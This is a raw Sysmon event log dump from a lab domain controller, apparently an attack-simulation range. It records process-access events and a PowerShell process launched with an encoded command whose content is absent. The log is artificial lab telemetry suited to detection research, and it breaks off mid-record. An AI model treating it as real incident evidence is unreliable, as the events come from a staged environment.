11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000423Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000422Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000421Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000420Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000419Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
11:59:59.013{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000418Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.013{266CAFBE-643E-6064-D102-00000000AD01}16042728C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94abc449|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f8d2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Ma
nagement.Automation.ni.dll+93f3f50d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94a0780b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93efc47f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f5fef1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41f00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41f00|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f41d91|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f32ab1|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3fff3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3fbc0|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f8d2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f3f50d|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+94a0780b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f247b8|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc
#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+93f23d2a 154100x8000000000000000417Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:59.015{266CAFBE-643F-6064-D202-00000000AD01}4608C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-643E-6064-F4EC-110000000000}0x11ecf40HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{266CAFBE-643E-6064-D102-00000000AD01}1604C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 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 10341000x8000000000000000579Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.638{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+1d1e8|C:\Windows\system32\lsasrv.dll+1c411|C:\Windows\system32\lsasrv.dll+1ac30|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000578Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+10d9e|C:\Windows\system32\lsasrv.dll+19616|C:\Windows\system32\lsasrv.dll+1abbf|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000577Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DA-6064-0B00-00000000AD01}8562840C:\Windows\system32\lsass.exe{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+1a18d|C:\Windows\system32\lsasrv.dll+2706b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 
10341000x8000000000000000576Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-6440-6064-D602-00000000AD01}12965004C:\Windows\system32\conhost.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000575Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000574Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000573Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000572Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000571Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000570Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000569Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000568Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000567Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-62C8-6064-0500-00000000AD01}620636C:\Windows\system32\csrss.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000566Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:00:00.622{266CAFBE-62DD-6064-0C00-00000000AD01}81068C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000565Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:00:00.622{266CAFBE-6440-6064-D902-00000000AD01}37122676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-6440-6064-DA02-00000000AD01}4644C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7eae91fa(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6c683(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa520
80857\System.Management.Automation.ni.dll+7df6c2be(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7ea345bc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df29230(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df8cca2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6ecb1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6ecb1(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df6eb42(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\d5c471afac895a838c8233aa52080857\System.Management.Automation.ni.dll+7df5f862(wow64)|C:\Windows\assembly\NativeIm